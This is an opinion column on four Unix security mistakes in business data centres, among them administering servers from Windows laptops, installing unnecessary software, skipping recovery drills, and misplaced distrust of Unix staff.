The four most common Unix security mistakes

Data centers are complex and technically stratified environments, but management tends to promote projects and people using the same technology the managers involved grew up with, while distrusting everything, and everyone, else
Written by Paul Murphy, Contributor

Everybody talks about computer security as if the term had a clear meaning, but it doesn't. So, to be clear, what I mean by it here is the maintenance of information integrity in a system - something that's very difficult to define clearly but is essentially a matter of being able to assure senior management that things are working, and are likely to continue working, as they should.

Unix is critical to business operations in most of the companies and organizations Management tends to promote projects and people using the same technology the managers involved grew up with. I've looked at (no doubt in large part because 100% Wintel or mainframe shops don't call me) and most express some security related concerns. In my experience most such clients have evolved IT infrastructures balancing large numbers of Windows or mainframe people against relatively few Unix people and consequently tilted much of their procedural decision making toward the policies appropriate to those environments and, correspondingly, not appropriate to Unix.

As a result they very often institutionalize policies exemplifying one or more of what I think of as the four worst security strategies affecting Unix deployment in business and government.

#1: Using Windows to administer Unix

By a country mile the number one security problem affecting Unix is the use of a Windows workstation and/or laptop by the sysadmin.

I've seen dozens of cases, for example, in which policy calls for secure shell log-in and all kinds of fancy security bells, whistles, logs, and authorizations - but several people with root access carry around "promiscuous" laptops and no one really knows whether, or when, keyloggers get installed.

That's absurd, but the most common corollary decision is even worse. An overwhelming majority of large IT shops doing this also store their passwords in a network document - often using Excel or Word. Get access to the thing, and you have every password for every device on their network. And you know where that file is usually stored? You bet: on a Windows server with unauthorized backups rejoicing in names like "passwords.doc" on every administrator PC and laptop in the place.


#2: Abandoning minimalism for convenience

Just about everybody does this - loading unneeded software on exposed servers or implementing SANS and switches where they're not needed. Every piece of software you add to a system, whether running on the main processor or on associated gear, adds vulnerabilities. The rule is simple: if it's not necessary, don't load it, don't use it, and don't worry about it.

I've been in places spending truckloads of cash on encryption, supervision, paper controls, and the latest in anti-intrusion and device management tools who cheerfully load everything on the DVDs that come with their Red Hat or whatever Enterprise Server licenses and then hook everything up to totally unreviewed and unnecessary SAN, LAN, and WAN gear because, you know "that's how we do things around here."


#3: Failing to practice preventative management

When it comes to the reliability and recovery components of systems integrity management most Unix managers talk a much better game than they play.

I don't think 1% of the people I've worked with have ever carried out an unscheduled systems interruption and recovery drill - just walk up to the most important server in the organization and pull the plug.

Cross team training, unscheduled drills, the devolution of root level systems control only to people with clearly defined server responsibilities - these are all basics of preventative maintenance programs - but an overwhelming majority of sites don't practice any of them.

Surprises will happen, and when they do the team that doesn't drill, won't be ready. I've been in places where thirty people in a half dozen rigidly separated organizational groups shared root access to big Unix servers. Everybody thought they needed control for their bit of the overall workload, but in the end no one could be held accountable when things failed - and the more people with root access, the more failures they cause.


#4: Focusing where the risk isn't

Data centers are complex and technically stratified environments, but management tends to promote projects and people using the same technology the managers involved grew up with, while distrusting everything, and everyone, else. As a result the typical overweighting of Wintel or mainframe personnel in the modern data center acts like a lens focusing distrust on Unix and mitigating against taking effective action to secure non Unix operations.

I see this all the time: management deploys tools and people to keep Solaris secure, while cheerfully trusting Windows patching, ignoring Cisco's gear, and blindly assuming the invulnerability of things like the RF systems in the warehouses or the guest WiFi devices providing DHCP services in the executive boardroom.

This happens on the organizational side too - with lots of emphasis on Solaris or Linux employee rotation while actual responsibility for primary application and server operations is diffused across numerous groups via server virtualization.

I have a favorite variation on this from a client which went to great lengths to secure their main servers - even insisting on a criminal records check for their Unix people. Meanwhile, the organization was dependent on a major third party application that had been heavily customized by temporaries ("consultants") sold them by the implementation services supplier -and no one had ever checked what all the scripts and stored procedures did. When I did, it turned out that the daily backup fired off a couple of odd processes quietly copying critical daily updates to an outside party.

Editorial standards